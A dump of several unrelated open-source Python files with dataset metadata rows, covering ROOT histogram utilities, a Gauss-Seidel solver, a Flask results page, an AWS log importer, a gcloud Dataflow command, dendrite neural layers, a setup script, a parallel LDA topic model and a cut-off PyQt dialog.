if obj.IsA().InheritsFrom("TH1") or obj.IsA().InheritsFrom("TTree"):
curdirname = stripPathName(tdir)
if len(curdirname)>0:
objpath = "%s/%s"%(stripPathName(tdir),obj.GetName())
else:
objpath = obj.GetName()
#print obj.GetName()," :-> ",objpath
outputlist.append( objpath )
elif obj.IsA().InheritsFrom("TDirectory"):
from ROOT import gDirectory
#print gDirectory.GetPath(),obj.GetName(),obj.GetPath()
outputlist += readDirectory( obj )
key=nextkey()
return outputlist
def checkTreeHasBranch( fileobj , treename , branchnane ):
"""
Check if Tree with name treename contained in TFile fileobj,
has a TBranch with name matching the regular expression branchname.
If found returns the name of the branch, otherwise None.
Note: Returns the first occurance of a branch matching the re
"""
thetree=fileobj.Get(treename)
if not thetree.IsA().InheritsFrom("TTree"):
return None
import re
mm=re.compile("^%s$"%branchnane)
for bridx in range(thetree.GetNbranches()):
candidate = thetree.GetListOfBranches()[bridx].GetName()
if mm.match( candidate ):
return candidate
return None
def buildUnbinnedInputs(tfile,paths):
"""
Creates and returns a list of StatTest.IO.Branch objects
corresponding to the specified list of tuples (treename, branchname,conf)
"""
inputs=[]
from IO import Branch
from Interface import Configuration
for treename,branchname,conf in paths:
#print treename,branchname,conf #########################
#print 'Creo Branch in file: ',tfile,' Da Tree.Branch: ',treename,branchname,
#print 'Typo container: ',conf[Configuration.TYPEKEY],' Di dimensione: ',conf[Configuration.SIZEKEY]
if conf.has_key(Configuration.ELEMENTKEY):
un = Branch( tfile , treename , branchname ,
Branch.BranchType.stringToValue( conf[Configuration.TYPEKEY] ),
conf[Configuration.SIZEKEY],
conf[Configuration.ELEMENTKEY])
else:
un = Branch( tfile , treename , branchname ,
Branch.BranchType.stringToValue( conf[Configuration.TYPEKEY] ),
conf[Configuration.SIZEKEY])
un.name = "%s:%s"%(treename,branchname)
inputs.append( un )
return inputs
def buildHistogramInputs( tfile, paths ):
"""
Creates and returns a list of StatTest.IO.Histogram objects
correponding to the specified list of paths
"""
inputs = []
from IO import Histogram
for objectname in paths:
try:
hh = Histogram(tfile,objectname)
hh.name = objectname
inputs.append( hh )
except WrongDataType:
#Not an histogram, skip
pass
return inputs
def makePage( algorithm , pagename , prefix=""):
from ROOT import TCanvas,kBlue,kRed,gROOT,kGreen,kYellow,kBlack
gROOT.SetBatch(True)
c=TCanvas( algorithm.output.name , algorithm.output.name )
c.Divide(1,2)
from Interface import Result
aColor = None
if algorithm.output.result == Result.FAILED:
aColor = kRed
if algorithm.output.result == Result.NOTPASSED:
aColor = kYellow
if algorithm.output.result == Result.SUCCESS:
aColor = kGreen
if algorithm.output.result == Result.UNDEFINED:
aColor = kBlack
if aColor:
c.SetFillColor( aColor )
aPad = c.cd(1)
if algorithm.output.logx:
aPad.SetLogx()
if algorithm.output.logy:
aPad.SetLogy()
from Utils import draw
_logger.info("Printing report..2.")
lims = ()
if "TH1" not in algorithm.test.dataset1.__class__.__name__:
lims = ( 100,
min( algorithm.test.dataset1.tolist() + algorithm.test.dataset2.tolist() ),
max( algorithm.test.dataset1.tolist() + algorithm.test.dataset2.tolist() )
)
if algorithm.output.logx and lims[1]<=0:
lims[1] = 1e-10
h1=draw( algorithm.test.dataset1 , kBlue , "" , lims , algorithm.output.name, algorithm.output.logx )
h2=draw( algorithm.test.dataset2 , kRed , "same", lims , algorithm.output.name+"ref", algorithm.output.logx )
from ROOT import TPaveText
pave=TPaveText(0.02,0.85,0.35,0.99,"NDC")
pave.SetTextColor(aColor)
pave.SetFillColor(1)
pave.AddText(" %s "%algorithm.output.result)
pave.AddText("(p-val: %s Test: %s)"%(algorithm.output.value,
algorithm.test.__class__.__name__))
pave.Draw()
aPad = c.cd(2)
if algorithm.output.logx:
aPad.SetLogx()
if 'residuals' in algorithm.test.__dict__:
algorithm.test.residuals.Draw()
else:
from Utils import makeResiduals
algorithm.test.residuals = makeResiduals( h1 , h2 )
algorithm.test.residuals.Draw()
c.Print(pagename+prefix)
def testme( filename="AtlasECAL_pi-_100_QGSP_BERT_95ref02.root" ):
"""
Test function
"""
from ROOT import TFile
f=TFile.Open(filename)
output=readDirectory( f )
for name in output:
print "Full path name: %s for object of name: %s and type: %s"%(name,f.Get(name).GetName(),f.Get(name).IsA().GetName())
#print output
return buildHistogramInputs(f, output )
| gpl-2.0 | -231,493,088,138,147,040 | 35.656627 | 127 | 0.618406 | false | 3.760816 | true | false | false |
DavideCanton/Python3 | num/gauss-seidel.py | 1 | 2710 | __author__ = 'davide'
import numpy as np
from collections import deque
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy.random as nprand
class Solver:
def __init__(self, start_x=None):
self.done = False
self.x = start_x
self.it = None
def set_params(self, A, b):
self.A = A
self.b = b
def _iterate(self):
d = len(b)
if self.x is None:
self.x = np.zeros(d)
while not self.done:
xn = np.zeros(d)
for i in range(d):
xn[i] = Solver.compute_x(i, self.x, xn,
self.A[i], self.b[i])
self.x = xn
yield xn
def iterate_sol(self):
yield from self._iterate()
def reset(self):
self.done = False
def end(self):
self.done = True
@staticmethod
def compute_x(i, x_old, x_new, row, b):
s1 = np.dot(row[:i], x_new[:i])
s2 = np.dot(row[i + 1:], x_old[i + 1:])
return (b - s1 - s2) / row[i]
def not_stable(A):
M = np.tril(A)
N = np.triu(A)
N[np.diag_indices_from(N)] = 0.
B = np.dot(np.linalg.inv(M), -N)
l, _ = np.linalg.eig(B)
return max(abs(l)) >= 1
if __name__ == "__main__":
N = 3
b = nprand.rand(N, 1) * 10 - 5
while True:
A = nprand.rand(N, N) * 10 - 5
if np.count_nonzero(A) == 0:
exit("Matrice nulla")
# if 0 in np.diag(A):
# print("Scambio")
# A = A[[1, 0]]
# if not_stable(A):
# exit("Metodo non stabile")
# print("Non stabile!")
if not not_stable(A):
break
print("A matrix:")
print(A)
print("rhs vector:")
print(b)
start_x = b
s = Solver(start_x)
s.set_params(A, b)
x, y, z = [], [], []
P = 10
L = deque([start_x], maxlen=P)
for rx, _ in zip(s.iterate_sol(), range(100000)):
last = L[-1]
L.append(rx)
x.append(rx[0])
y.append(rx[1])
try:
z.append(rx[2])
except IndexError:
z.append(0)
if np.allclose(last, rx):
break
s.end()
sol = L[-1]
print("Solution:")
print(sol)
error = np.dot(A, sol) - b
print("Error:")
print(error)
if np.linalg.norm(error) > 1e8:
print("ERROR!")
fig = plt.figure()
plt.title(
"Iteration of Gauss-Seidel Method with A={} and b={}".format(A, b))
ax = fig.add_subplot(111, projection='3d')
ax.plot(x, y, z, "bo-")
plt.show() | gpl-3.0 | 515,264,414,718,476,800 | 20.983051 | 75 | 0.460148 | false | 3.125721 | false | false | false |
iashwinprasada/VTU-Profiler | views.py | 1 | 1765 | from ResultBackEnd import resultlogic, USNValidate
from flask import Flask, request, flash, url_for, redirect, render_template, abort
import json
app=Flask(__name__)
app.config.from_pyfile('AppConfig.cfg')
app.config['PROPAGATE_EXCEPTIONS'] = True
@app.route('/result',methods=['GET', 'POST'])
def result():
return render_template('result.html')
@app.route('/', methods=['GET', 'POST'])
@app.route('/index', methods=['GET', 'POST'])
def index():
error = None
if request.method == 'POST':
U = request.form['USN']
u1 = USNValidate.USN(U)
if u1.isValidUSN() == False:
error = u1.getErrors()
flash (error)
else:
marks,usn_name = resultlogic.get_result(U)
sub=marks[0]
subjects_vtu = []
marks_ext = []
marks_int = []
total_sub = []
for i in range(0,len(marks)):
#print "Subject \n"
subjects_vtu.append(marks[i][0])
#print "Marks \n"
marks_ext.append(int(marks[i][1]))
marks_int.append(int(marks[i][2]))
total_sub.append(marks_int[i]+marks_ext[i])
int_sum_per = (sum(x for x in marks_int))
ext_sum_per = (sum(x for x in marks_ext))
# usn_name= "namehere"
usn_college=u1.college
usn_reg= u1.region
usn_branch=u1.stream
return render_template('result.html',name=usn_name,college=usn_college,region=usn_reg,branch=usn_branch,n=range(len(marks)), sub=subjects_vtu,extr=marks_ext,intr=marks_int,extpr=ext_sum_per,intpr=int_sum_per,tot=total_sub)
return render_template('main.html', error=error)
if __name__ == "__main__":
app.run()
| gpl-2.0 | 3,172,918,091,581,324,300 | 36.553191 | 234 | 0.567705 | false | 3.238532 | false | false | false |
riolet/SAM | sam/importers/import_aws.py | 2 | 1595 | import sys
from sam.importers.import_base import BaseImporter
import datetime
class AWSImporter(BaseImporter):
def translate(self, line, line_num, dictionary):
"""
Converts a given syslog line into a dictionary of (ip, port, ip, port)
Args:
line: The syslog line to parse
line_num: The line number, for error printouts
dictionary: The dictionary to write key/values pairs into
Returns:
0 on success and non-zero on error.
"""
try:
awsLog = line.split(" ")
dictionary['src'] = self.ip_to_int(*(awsLog[3].split(".")))
dictionary['srcport'] = int(awsLog[5])
dictionary['dst'] = self.ip_to_int(*(awsLog[4].split(".")))
dictionary['dstport'] = int(awsLog[6])
dictionary['timestamp'] = datetime.datetime.fromtimestamp((float(awsLog[10])))
# TODO: the following is placeholder.
# Needed: test data or spec to read
dictionary['protocol'] = 'TCP'.upper()
dictionary['duration'] = '1'
dictionary['bytes_received'] = '1'
dictionary['bytes_sent'] = '1'
dictionary['packets_received'] = '1'
dictionary['packets_sent'] = '1'
except:
return 1
return 0
class_ = AWSImporter
# If running as a script, begin by executing main.
if __name__ == "__main__":
sys.stderr.write("Warning: This importer is incomplete and uses empty data for some fields.")
importer = class_()
importer.main(sys.argv)
| gpl-3.0 | 7,908,484,718,748,201,000 | 34.444444 | 97 | 0.576176 | false | 4.153646 | false | false | false |
Sorsly/subtle | google-cloud-sdk/lib/surface/dataflow/jobs/run.py | 6 | 2918 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of gcloud dataflow jobs run command.
"""
from googlecloudsdk.api_lib.dataflow import apis
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import properties
@base.ReleaseTracks(base.ReleaseTrack.BETA, base.ReleaseTrack.GA)
class Run(base.Command):
"""Runs a job from the specified path.
"""
@staticmethod
def Args(parser):
"""Register flags for this command.
Args:
parser: argparse.ArgumentParser to register arguments with.
"""
parser.add_argument(
'job_name',
metavar='JOB_NAME',
help='The unique name to assign to the job.')
parser.add_argument(
'--gcs-location',
help='The location of the job template to run.',
required=True)
parser.add_argument(
'--zone',
type=arg_parsers.RegexpValidator(
r'\w+-\w+\d-\w', 'must provide a valid zone'),
help='The zone to run the workers in.')
parser.add_argument(
'--service-account-email',
type=arg_parsers.RegexpValidator(
r'.*@.*\..*', 'must provide a valid email address'),
help='The service account to run the workers as.')
parser.add_argument(
'--max-workers',
type=int,
help='The maximum number of workers to run.')
parser.add_argument(
'--parameters',
metavar='PARAMETERS',
type=arg_parsers.ArgDict(),
action=arg_parsers.UpdateAction,
help='The parameters to pass to the job.')
def Run(self, args):
"""Runs the command.
Args:
args: The arguments that were provided to this command invocation.
Returns:
A Job message.
"""
if not args.gcs_location.startswith('gs://'):
raise exceptions.ToolException("""\
--gcs-location must begin with 'gs://'. Provided value was '{value}'.
""".format(value=args.gcs_location))
job = apis.Templates.Create(
project_id=properties.VALUES.core.project.Get(required=True),
gcs_location=args.gcs_location,
job_name=args.job_name,
parameters=args.parameters,
service_account_email=args.service_account_email,
zone=args.zone,
max_workers=args.max_workers)
return job
| mit | 1,607,969,847,129,877,000 | 30.717391 | 74 | 0.668266 | false | 4.041551 | false | false | false |
mrcslws/nupic.research | nupic/research/frameworks/continual_learning/dendrite_layers.py | 3 | 6169 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2020, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import numpy as np
import torch
import torch.nn.functional as F
from torch import nn
from nupic.research.frameworks.continual_learning.dend_kwinners import (
DendriteKWinners2dLocal,
)
from nupic.torch.modules import SparseWeights
class DendriteInput(nn.Module):
""" Sparse linear layer from previous output to
"dendrites" - this is the first part of a module
that projects via dendrite segments to output units.
:param in_dim: input dimension
:param n_dendrites: total number of dendrites - note this will
be an integer multiple of the number of downstream units
:param threshold: (currently unused) - threshold for an
in-development dendritic activation or gating function
:param weight_sparsity: Weight sparsity of the sparse weights.
If weight_sparsity=1, it will default to a standard linear layer.
"""
def __init__(
self, in_dim, n_dendrites, threshold=2, weight_sparsity=0.2,
):
super(DendriteInput, self).__init__()
self.threshold = threshold
linear = nn.Linear(in_dim, n_dendrites)
if weight_sparsity < 1:
self.linear = SparseWeights(linear, weight_sparsity)
else:
self.linear = linear
def forward(self, x):
""" Note this only returns the linear output """
out = self.linear(x)
return out
class DendriteOutput(nn.Module):
""" Masked linear layer from dendrites to output
units. This is the second part of the full module.
:param out_dim: output dimension (number of downstream units)
:param dendrites_per_unit: integer number of dendrite
segments per unit
"""
def __init__(self, out_dim, dendrites_per_unit):
super(DendriteOutput, self).__init__()
self.dendrites_per_unit = dendrites_per_unit
self.register_buffer("mask", self.dend_mask(out_dim))
self.weight = torch.nn.Parameter(
torch.Tensor(out_dim, dendrites_per_unit * out_dim)
)
self.bias = torch.nn.Parameter(torch.Tensor(out_dim), requires_grad=True)
# for stability - will integrate separate weight init. later
nn.init.kaiming_uniform_(self.weight)
self.bias.data.fill_(0.0)
def forward(self, x):
w = self.weight * self.mask
return F.linear(x, w, self.bias)
def dend_mask(self, out_dim):
"""This creates a mask such that each dendrite
unit only projects to one downstream unit
"""
mask = torch.zeros(out_dim, out_dim)
inds = np.diag_indices(out_dim)
mask[inds[0], inds[1]] = 1.0
out_mask = torch.repeat_interleave(mask, self.dendrites_per_unit, dim=0).T
return out_mask
class DendriteLayer(nn.Module):
""" This is the full module, combining DendriteInput
and DendriteOutput. The module also specifies an
activation function for the dendrite units
(in this case a Kwinners2DLocal).
:param in_dim: input dimension for DendriteInput
:param out_dim: output dimension for DendriteOutput
:param dendrites_per_neuron: dendrites per downstream unit
:param weight_sparsity: DOC
:param act_fun_type
"""
def __init__(
self,
in_dim,
out_dim,
dendrites_per_neuron,
weight_sparsity=0.2,
act_fun_type="kwinner",
):
super(DendriteLayer, self).__init__()
self.dendrites_per_neuron = dendrites_per_neuron
self.n_dendrites = out_dim * self.dendrites_per_neuron
self.out_dim = out_dim
self.act_fun_type = act_fun_type
self.input = DendriteInput(
in_dim=in_dim,
n_dendrites=self.n_dendrites,
weight_sparsity=weight_sparsity,
)
self.output = DendriteOutput(out_dim, self.dendrites_per_neuron)
def forward(self, x, cat_projection=1.0):
""" cat_proj here is an optional argument
for a categorical "feedback" projection to
the dendrite segments
"""
if self.act_fun_type == "kwinner":
return self.forward_kwinner(x, cat_projection)
elif self.act_fun_type == "sigmoid":
return self.forward_sigmoid(x, cat_projection)
else:
raise AssertionError("act_fun_type must be ''kwinner'' or ''sigmoid'' ")
def forward_kwinner(self, x, cat_projection=1.0): # cat_projection = 1.0 is cleaner
""" cat_projection is scalar categorical input
"""
batch_size = x.shape[0]
out0 = self.input(x)
out0 = out0 * cat_projection # will be identity without categorical projection
# if statements introduce bug potential and are slower on GPU
out0_ = out0.reshape(batch_size, self.out_dim, self.dendrites_per_neuron)
out1_ = DendriteKWinners2dLocal.apply(out0_, 1)
out1_1 = out1_.reshape(batch_size, self.out_dim * self.dendrites_per_neuron)
out2 = self.output(out1_1)
return out2
def forward_sigmoid(self, x, cat_projection=1.0):
out0 = self.input(x)
out1_pre = out0 * cat_projection
out1 = torch.sigmoid(out1_pre)
out2 = self.output(out1)
return out2
| agpl-3.0 | -6,019,589,543,891,049,000 | 32.895604 | 88 | 0.641109 | false | 3.714028 | false | false | false |
kapilsaxena33/pyentropy | setup.py | 3 | 2730 | import sys, os
import pyentropy
# BEFORE importing disutils, remove MANIFEST. distutils doesn't properly
# update it when the contents of directories change.
if os.path.exists('MANIFEST'): os.remove('MANIFEST')
from distutils.core import setup
from distutils.extension import Extension
from distutils.command.build_ext import build_ext
from distutils.errors import CCompilerError, DistutilsExecError
extension_build_failed = False
def ext_failed_warning(name):
print ('*'*70+'\n')*3
print """WARNING: The %s extension module could not be
compiled. pyEntropy should run, but the features
present in that file will not be available.
Above is the ouput showing how the compilation
failed."""%name
if sys.platform == 'win32':
print
print """I see you are using Windows. The default
compiler for this platform is the Microsoft Visual
Studio C compiler. However, a free alternative
compiler called mingw can be used instead."""
print
print ('*'*70+'\n')*3
global extension_build_failed
extension_build_failed = True
try:
from gsl_dist.gsl_Extension import gsl_Extension
except DistutilsExecError:
ext_failed_warning('gsl-based')
exts = []
wrap_sources = ['hist_c.c', 'sort_c.c', 'gen_c.c', 'entropy_c.c',
'entropy_nsb_c.cpp', 'wrap.c']
statk_wrap_sources = [os.path.join('pyentropy','statk',x) for x in wrap_sources]
try:
statk_wrap = gsl_Extension("statk.wrap",
sources = statk_wrap_sources,
gsl_min_version=(1,),
python_min_version=(2,5)
)
exts.append(statk_wrap)
except:
pass
class build_ext_allow_fail( build_ext ):
# This class allows C extension building to fail.
# Taken from visionegg (LGPL)
# http://github.com/visionegg/visionegg/blob/master/setup.py
# http://www.visionegg.org/
def build_extension(self, ext):
try:
build_ext.build_extension(self, ext)
except CCompilerError, x:
ext_failed_warning(ext.name)
setup(name='pyentropy',
version=pyentropy.__version__,
description='Entropy and Information Theoretic Estimates',
author=pyentropy.__author__,
author_email='[email protected]',
url='http://code.google.com/p/pyentropy',
packages=['pyentropy','pyentropy.tests','pyentropy.statk'],
ext_package='pyentropy',
ext_modules=exts,
cmdclass={'build_ext':build_ext_allow_fail}
)
if extension_build_failed:
print ('*'*70+'\n')*3
print """WARNING: Building of some extensions failed. Please
see the messages above for details.\n"""
print ('*'*70+'\n')*3
| gpl-2.0 | -4,004,113,109,979,347,500 | 30.022727 | 80 | 0.651282 | false | 3.699187 | false | false | false |
abhinavgupta/YALDA | lda.py | 1 | 12462 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Latent Dirichlet Allocation + collapsed Gibbs sampling
# This code is available under the MIT License.
# (c)2010-2011 Nakatani Shuyo / Cybozu Labs Inc.
# UPDATES:
# -Parallelisation of the Gibbs Sampler
# -Online Processing of Documents
# Related Paper:
# -On-line Trend Analysis with Topic Models: #twitter trends detection topic model online
# (COLING 2012)
import numpy
import operator
import time
import os
import pickle
from multiprocessing import Pool
import threading
def parallel_inference(i, st, ed, o_docs, o_z_m_n, o_n_m_z, o_n_z_t, o_n_z):
# print "i =", i, "st =", st, "ed =", ed, "docs =", o_docs
# print "BEFORE:"
# print "\tz_m_n =", o_z_m_n
# print "\tn_m_z =", o_n_m_z
# print "\tn_z_t =", o_n_z_t
# print "\tn_z =", o_n_z
for m, doc in enumerate(o_docs):
z_n = o_z_m_n[m]
n_m_z = o_n_m_z[m]
for n, t in enumerate(doc):
# discount for n-th word t with topic z
z = z_n[n]
n_m_z[z] -= 1
o_n_z_t[z, t] -= 1
o_n_z[z] -= 1
# sampling topic new_z for t
p_z = o_n_z_t[:, t] * n_m_z / o_n_z
new_z = numpy.random.multinomial(1, p_z / p_z.sum()).argmax()
# set z the new topic and increment counters
z_n[n] = new_z
n_m_z[new_z] += 1
o_n_z_t[new_z, t] += 1
o_n_z[new_z] += 1
# print "AFTER:"
# print "\tz_m_n =", o_z_m_n
# print "\tn_m_z =", o_n_m_z
# print "\tn_z_t =", o_n_z_t
# print "\tn_z =", o_n_z
return (i, st, ed, o_z_m_n, o_n_m_z, o_n_z_t, o_n_z)
class LDA:
def __init__(self, K, alpha, beta, cont, docs, docs_nt, V, docs_times, output_dir, prev_lda, \
nproc, smartinit=True):
self.K = K
self.alpha = alpha # parameter of topics prior
self.beta = beta # parameter of words prior
self.cont = cont # contribution proportion of history topics
self.docs = docs
self.docs_nt = docs_nt
self.docs_times = docs_times
self.V = V
self.output_dir = output_dir
self.nproc = nproc
self.tlock = threading.Lock()
self.z_m_n = [] # topics of words of documents
self.n_m_z = numpy.zeros((len(self.docs), K)) + alpha
self.n_z_t = numpy.zeros((K, V)) + beta # word count of each topic and vocabulary
self.n_z_t_new = numpy.zeros((K, V)) # new word count of each topic and vocabulary
self.n_z = numpy.zeros(K) + V * beta # word count of each topic
if prev_lda != None:
#convert the old model's topic-word matrix counts to proportion
sum_n_z_t = 0
for z_t in prev_lda.n_z_t:
sum_n_z_t += sum(z_t)
for (z, z_t) in enumerate(prev_lda.n_z_t):
for (t, val) in enumerate(z_t):
self.n_z_t[z, t] = ((float(prev_lda.n_z_t[z,t]) / \
sum_n_z_t)*self.V*self.K*self.beta*(self.cont)) \
+ (self.beta*(1.0-self.cont))
for (z, val) in enumerate(self.n_z):
self.n_z[z] = sum(self.n_z_t[z])
for (row_id, row) in enumerate(prev_lda.n_m_z):
for (col_id, col) in enumerate(row):
self.n_m_z[row_id][col_id] = col
self.N = 0
for m, doc in enumerate(docs):
self.N += len(doc)
z_n = []
for t in doc:
if smartinit:
p_z = self.n_z_t[:, t] * self.n_m_z[m] / self.n_z
z = numpy.random.multinomial(1, p_z / p_z.sum()).argmax()
else:
z = numpy.random.randint(0, K)
z_n.append(z)
self.n_m_z[m, z] += 1
self.n_z_t[z, t] += 1
self.n_z[z] += 1
self.z_m_n.append(numpy.array(z_n))
#update the document timestamp
prev_time = docs_times[m]
def parallel_inference_complete(self, result):
(i, st, ed, z_m_n, n_m_z, n_z_t, n_z) = result
self.tlock.acquire()
#update z_m_n and n_m_z
self.z_m_n[st:ed] = z_m_n
self.n_m_z[st:ed] = n_m_z
#update n_z_t (reduce-scatter operation)
self.n_z_t_new = self.n_z_t_new + (n_z_t - self.n_z_t)
self.tlock.release()
def inference(self):
# print "ORIGINAL:"
# print "\tdocs =", self.docs
# print "\tz_m_n =", self.z_m_n
# print "\tn_m_z =", self.n_m_z
# print "\tn_z_t =", self.n_z_t
# print "\tn_z =", self.n_z
#refesh the n_z_t array used for storing new counts
self.n_z_t_new = numpy.zeros((self.K, self.V))
#Spawn a number of threads to do the inference
po = Pool()
num_doc_per_proc = float(len(self.docs))/self.nproc
for i in range(0, self.nproc):
st = int(round(float(i)*num_doc_per_proc))
ed = int(round(float(i+1)*num_doc_per_proc))
po.apply_async(parallel_inference, \
(i, st, ed, self.docs[st:ed], self.z_m_n[st:ed], self.n_m_z[st:ed], \
self.n_z_t, self.n_z), callback=self.parallel_inference_complete)
po.close()
po.join()
#update n_z_t
self.n_z_t = self.n_z_t + self.n_z_t_new
#update n_z
self.n_z = numpy.sum(self.n_z_t, 1)
# print "MERGED:"
# print "\tz_m_n =", self.z_m_n
# print "\tn_m_z =", self.n_m_z
# print "\tn_z_t =", self.n_z_t
# print "\tn_z =", self.n_z
def worddist(self):
"""get topic-word distribution"""
return self.n_z_t / self.n_z[:, numpy.newaxis]
def perplexity(self, docs=None):
if docs == None: docs = self.docs
phi = self.worddist()
log_per = 0
N = 0
Kalpha = self.K * self.alpha
for m, doc in enumerate(docs):
theta = self.n_m_z[m] / (len(self.docs[m]) + Kalpha)
for w in doc:
log_per -= numpy.log(numpy.inner(phi[:,w], theta))
N += len(doc)
return numpy.exp(log_per / N)
def drop_one_day_data(voca, lda, alpha):
n_firstday = lda.docs_nt[0]
#decrement the counts of topic-word matrix for the documents to be removed
for (m, doc) in enumerate(lda.docs[:n_firstday]):
for (n, t) in enumerate(doc):
z = lda.z_m_n[m][n]
lda.n_z_t[z, t] -= 1
lda.n_z[z] -= 1
voca.wordfreq[t] -= 1
lda.docs = lda.docs[n_firstday:]
lda.docs_nt = lda.docs_nt[1:]
lda.docs_times = lda.docs_times[n_firstday:]
lda.z_m_n = lda.z_m_n[n_firstday:]
lda.n_m_z = lda.n_m_z[n_firstday:]
#convert the n_m_z counts to priors
total_n_m_z = 0.0
for n_m in lda.n_m_z:
total_n_m_z += sum(n_m)
for (m, n_m) in enumerate(lda.n_m_z):
for (z, count) in enumerate(n_m):
new_prior = (float(count)/(total_n_m_z))*len(lda.n_m_z)*lda.K*alpha
lda.n_m_z[m][z] = new_prior
return (voca, lda)
def lda_learning(lda, iteration, voca):
pre_perp = lda.perplexity()
print "initial perplexity=%f" % pre_perp
for i in range(iteration):
start = time.time()
lda.inference()
print "(%.1fs) iter=%d" % (time.time()-start, i + 1),
if ( (i+1)%50 == 0):
perp = lda.perplexity()
print "p=%f" % (perp)
else:
print
output_word_topic_dist(lda, voca)
def output_word_topic_dist(lda, voca):
phi = lda.worddist()
topics_file = open(lda.output_dir + "/topics.txt", "w")
for k in range(lda.K):
#print "\n-- topic: %d" % k
for w in numpy.argsort(-phi[k])[:10]:
#print "%s: %f" % (voca[w], phi[k,w])
topics_file.write(voca[w] + " ")
topics_file.write("\n")
def main():
import optparse
import vocabulary
parser = optparse.OptionParser()
parser.add_option("-f", dest="filename", type="string", help="corpus filename")
parser.add_option("-t", dest="time_file", help="timestamp of documents")
parser.add_option("-o", dest="output_dir", type="string", help="output directory")
parser.add_option("-m", dest="model", help="previously trained model")
parser.add_option("--alpha", dest="alpha", type="float", help="parameter alpha", default=0.001)
parser.add_option("--beta", dest="beta", type="float", help="parameter beta", default=0.01)
parser.add_option("-p", dest="cont", type="float", help="parameter contribution proportion", \
default=0.5)
parser.add_option("-k", dest="K", type="int", help="number of topics", default=50)
parser.add_option("-i", dest="iteration", type="int", help="iteration count", default=500)
parser.add_option("-s", dest="smartinit", action="store_false", \
help="smart initialize of parameters", default=True)
parser.add_option("--stopwords", dest="stopwords", help="exclude stop words", \
action="store_true", default=True)
parser.add_option("--seed", dest="seed", type="int", help="random seed")
parser.add_option("--wf", dest="wf", type="int", \
help="threshold of word frequency to cut words", default=1)
parser.add_option("--num-proc", dest="nproc", type="int", help="number of processors", \
default=4)
(options, args) = parser.parse_args()
if not (options.filename) or \
not (options.time_file) or not(options.output_dir):
parser.error("need (corpus filename(-f) and "
"document timestamp file(-t) and output directory(-o)")
if options.filename:
corpus = vocabulary.load_file(options.filename)
if options.seed != None:
numpy.random.seed(options.seed)
if not os.path.exists(options.output_dir):
os.makedirs(options.output_dir)
voca = vocabulary.Vocabulary(options.stopwords, options.wf)
if options.model:
(prev_voca, prev_lda) = pickle.load(open(options.model))
#drop one day worth's of data to accommodate the new day's data
prev_voca, prev_lda = drop_one_day_data(prev_voca, prev_lda, options.alpha)
options.K = prev_lda.K
else:
prev_lda = None
prev_voca = None
#generate the vocabularies for voca
voca.gen_vocabs(corpus, prev_voca, prev_lda)
docs = [voca.doc_to_ids(doc) for doc in corpus]
#calculate the number of elements for each timestamp group in docs
docs_nt = []
docs_times = [ item.strip() for item in open(options.time_file).readlines() ]
tmp_nt = {}
for time in set(docs_times):
tmp_nt[time] = docs_times.count(time)
for (time, count) in sorted(tmp_nt.items()):
docs_nt.append(count)
tmp_nt.clear()
if options.model:
#update docs
tmp_docs = []
tmp_docs.extend(prev_lda.docs)
tmp_docs.extend(docs)
docs = tmp_docs
#update docs_times
tmp_docs_times = []
tmp_docs_times.extend(prev_lda.docs_times)
tmp_docs_times.extend(docs_times)
docs_times = tmp_docs_times
#update docs_nt
tmp_docs_nt = []
tmp_docs_nt.extend(prev_lda.docs_nt)
tmp_docs_nt.extend(docs_nt)
docs_nt = tmp_docs_nt
#if options.wf > 0: docs = voca.cut_low_freq(docs, options.wf)
#initialise lda
lda = LDA(options.K, options.alpha, options.beta, options.cont, docs, docs_nt, voca.size(), \
docs_times, options.output_dir, prev_lda, options.nproc, options.smartinit)
#print word frequency
freqword = {}
freqword_file = open(lda.output_dir + "/freqwords.txt", "w")
for (vocab_id, freq) in enumerate(voca.wordfreq):
freqword[voca.vocas[vocab_id]] = freq
for (vocab, freq) in sorted(freqword.items(), key=operator.itemgetter(1), reverse=True):
freqword_file.write(vocab + " " + str(freq) + "\n")
freqword_file.flush()
print "corpus=%d, words=%d, K=%d, a=%f, b=%f, nproc=%d" % (len(corpus), len(voca.vocas),
options.K, options.alpha, options.beta, options.nproc)
#import cProfile
#cProfile.runctx('lda_learning(lda, options.iteration, voca)', globals(), locals(), 'lda.profile')
lda_learning(lda, options.iteration, voca)
#save the model for potential re-use later
lda.tlock = None
pickle.dump((voca, lda), open(options.output_dir + "/model.dat", "w"))
if __name__ == "__main__":
main()
| apache-2.0 | -2,468,384,668,615,679,500 | 35.545455 | 102 | 0.55264 | false | 2.940538 | false | false | false |
NathanW2/qmap | src/qmap/datatimerpickerwidget.py | 1 | 4232 | from PyQt4.QtGui import QDialog,QApplication, QButtonGroup
from PyQt4.QtCore import QTime, Qt, QDateTime
from ui_datatimerpicker import Ui_datatimerpicker
from qgis.core import *
from utils import log
class DateTimePickerDialog(QDialog):
"""
A custom date picker with a time and date picker
"""
def __init__(self, mode="DateTime"):
QDialog.__init__(self)
# Set up the user interface from Designer.
self.ui = Ui_datatimerpicker()
self.ui.setupUi(self)
self.mode = mode
self.group = QButtonGroup()
self.group.setExclusive(True)
self.group.addButton(self.ui.ambutton)
self.group.addButton(self.ui.pmbutton)
self.ui.ambutton.toggled.connect(self.isDirty)
